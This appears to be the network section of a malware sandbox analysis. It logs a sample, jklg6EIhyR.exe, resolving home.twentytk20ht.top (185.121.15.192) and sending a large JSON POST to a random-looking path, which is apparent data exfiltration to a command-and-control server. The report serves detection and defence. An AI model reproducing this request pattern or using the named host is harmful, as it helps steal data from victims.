                                                  Dec 26, 2024 13:08:03.116871119 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116879940 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116961002 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116970062 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117016077 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117091894 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117151022 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117158890 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117219925 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117229939 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117275953 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117285013 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117325068 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117353916 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117445946 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117463112 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117535114 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117584944 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117676973 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117686033 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117830038 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117840052 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117856026 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117865086 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117917061 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117925882 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118021011 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118031025 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118081093 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118089914 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118179083 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118187904 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118220091 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118232012 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118280888 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118289948 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118395090 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118465900 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.119261980 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.119385004 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.215169907 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215233088 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215292931 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215348959 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215379953 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215408087 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215459108 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215486050 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215533972 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215560913 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215686083 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215737104 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215787888 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215835094 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215939999 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215966940 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216000080 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216051102 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216167927 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216196060 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216269970 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216321945 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216372013 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216430902 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216573954 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216629028 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216659069 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216725111 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216758013 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216860056 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216954947 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216981888 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217031956 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217087030 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217119932 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217164993 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217231035 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217257977 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217308998 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217336893 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217411041 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217534065 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217562914 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217590094 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217638969 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217672110 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217720985 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217747927 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217794895 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217822075 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217870951 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217919111 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.218014002 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.218041897 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.230421066 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.230521917 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.239017963 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239047050 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239128113 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239136934 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239238024 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239247084 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239331961 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239341021 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239384890 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239393950 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239526033 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239672899 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239682913 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239691973 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239757061 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239816904 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239847898 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239856958 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239967108 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239975929 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240123034 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240133047 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240216017 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240226030 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240314960 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240324020 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240398884 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240408897 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240550041 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240577936 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240685940 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240696907 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240890980 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240900993 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241004944 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241015911 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241082907 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241127014 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241178036 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241187096 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241288900 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241297960 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241336107 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241345882 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241420984 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241451979 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241532087 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241544008 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241624117 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241633892 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241738081 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241745949 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241751909 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.242707014 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.242969990 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.350297928 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350378036 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350389957 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350450993 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350634098 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350646019 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350785971 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350856066 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350930929 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350954056 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351066113 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351099968 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351141930 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351248980 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351299047 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351391077 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351399899 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351408958 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351464033 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351480007 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351629972 CET8049701185.121.15.192192.168.2.7
Dec 26, 2024 13:08:03.351639986 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.351649046 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.351661921 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.351699114 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.351707935 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.351762056 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.351771116 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.351805925 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.351897001 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.351979971 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352034092 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352078915 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352149963 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352159977 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352185011 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352220058 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352277040 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352286100 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352374077 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352384090 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352441072 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352531910 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352541924 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352550983 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352667093 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352674961 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352790117 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352802038 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352870941 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352880001 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352948904 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352974892 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.352983952 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362624884 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362646103 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362664938 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362673998 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362740993 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362751007 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362823963 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362839937 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362932920 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.362941980 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363023996 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363033056 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363075018 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363091946 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363178015 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363187075 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363234043 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363337994 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363348007 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363374949 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363462925 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363476038 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363514900 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363526106 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363645077 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363653898 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:03.363692045 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:05.768627882 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:05.768709898 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:05.768829107 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:05.769061089 CET | 49701 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:05.888581991 CET | 80 | 49701 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:05.985232115 CET | 49712 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:06.105010986 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:06.105106115 CET | 49712 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:06.105479956 CET | 49712 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:06.224977016 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:07.638019085 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:07.638045073 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:07.638159037 CET | 49712 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:07.638598919 CET | 49712 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:07.758093119 CET | 80 | 49712 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:07.830562115 CET | 49718 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:07.950872898 CET | 80 | 49718 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:07.951069117 CET | 49718 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:07.956662893 CET | 49718 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:08.076350927 CET | 80 | 49718 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:09.587387085 CET | 80 | 49718 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:09.587706089 CET | 80 | 49718 | 185.121.15.192 | 192.168.2.7
Dec 26, 2024 13:08:09.587914944 CET | 49718 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:09.587914944 CET | 49718 | 80 | 192.168.2.7 | 185.121.15.192
Dec 26, 2024 13:08:09.707576990 CET | 80 | 49718 | 185.121.15.192 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 13:07:57.260162115 CET | 57639 | 53 | 192.168.2.7 | 1.1.1.1
Dec 26, 2024 13:07:57.260222912 CET | 57639 | 53 | 192.168.2.7 | 1.1.1.1
Dec 26, 2024 13:07:57.398447990 CET | 53 | 57639 | 1.1.1.1 | 192.168.2.7
Dec 26, 2024 13:07:57.398777962 CET | 53 | 57639 | 1.1.1.1 | 192.168.2.7
Dec 26, 2024 13:08:01.236671925 CET | 61044 | 53 | 192.168.2.7 | 1.1.1.1
Dec 26, 2024 13:08:01.236746073 CET | 61044 | 53 | 192.168.2.7 | 1.1.1.1
Dec 26, 2024 13:08:01.379858971 CET | 53 | 61044 | 1.1.1.1 | 192.168.2.7
Dec 26, 2024 13:08:01.543785095 CET | 53 | 61044 | 1.1.1.1 | 192.168.2.7
Dec 26, 2024 13:08:05.846132994 CET | 61046 | 53 | 192.168.2.7 | 1.1.1.1
Dec 26, 2024 13:08:05.846191883 CET | 61046 | 53 | 192.168.2.7 | 1.1.1.1
Dec 26, 2024 13:08:05.984355927 CET | 53 | 61046 | 1.1.1.1 | 192.168.2.7
Dec 26, 2024 13:08:05.984380960 CET | 53 | 61046 | 1.1.1.1 | 192.168.2.7
Dec 26, 2024 13:08:07.692508936 CET | 61048 | 53 | 192.168.2.7 | 1.1.1.1
Dec 26, 2024 13:08:07.692616940 CET | 61048 | 53 | 192.168.2.7 | 1.1.1.1
Dec 26, 2024 13:08:07.829796076 CET | 53 | 61048 | 1.1.1.1 | 192.168.2.7
Dec 26, 2024 13:08:07.829854012 CET | 53 | 61048 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 13:07:57.260162115 CET | 192.168.2.7 | 1.1.1.1 | 0xaeb0 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:07:57.260222912 CET | 192.168.2.7 | 1.1.1.1 | 0x224c | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 26, 2024 13:08:01.236671925 CET | 192.168.2.7 | 1.1.1.1 | 0xb22f | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:08:01.236746073 CET | 192.168.2.7 | 1.1.1.1 | 0x248f | Standard query (0) | home.twentytk20ht.top | 28 | IN (0x0001) | false
Dec 26, 2024 13:08:05.846132994 CET | 192.168.2.7 | 1.1.1.1 | 0x9ee7 | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:08:05.846191883 CET | 192.168.2.7 | 1.1.1.1 | 0x6580 | Standard query (0) | home.twentytk20ht.top | 28 | IN (0x0001) | false
Dec 26, 2024 13:08:07.692508936 CET | 192.168.2.7 | 1.1.1.1 | 0xa7b1 | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:08:07.692616940 CET | 192.168.2.7 | 1.1.1.1 | 0x3bc1 | Standard query (0) | home.twentytk20ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 13:07:57.398777962 CET | 1.1.1.1 | 192.168.2.7 | 0xaeb0 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:07:57.398777962 CET | 1.1.1.1 | 192.168.2.7 | 0xaeb0 | No error (0) | httpbin.org | | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:08:01.379858971 CET | 1.1.1.1 | 192.168.2.7 | 0xb22f | No error (0) | home.twentytk20ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:08:05.984355927 CET | 1.1.1.1 | 192.168.2.7 | 0x9ee7 | No error (0) | home.twentytk20ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:08:07.829796076 CET | 1.1.1.1 | 192.168.2.7 | 0xa7b1 | No error (0) | home.twentytk20ht.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                                  • httpbin.org
                                                  • home.twentytk20ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 185.121.15.192 | 80 | 6676 | C:\Users\user\Desktop\jklg6EIhyR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 13:08:01.666589975 CET | 12360 | OUT | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                  Host: home.twentytk20ht.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 556460
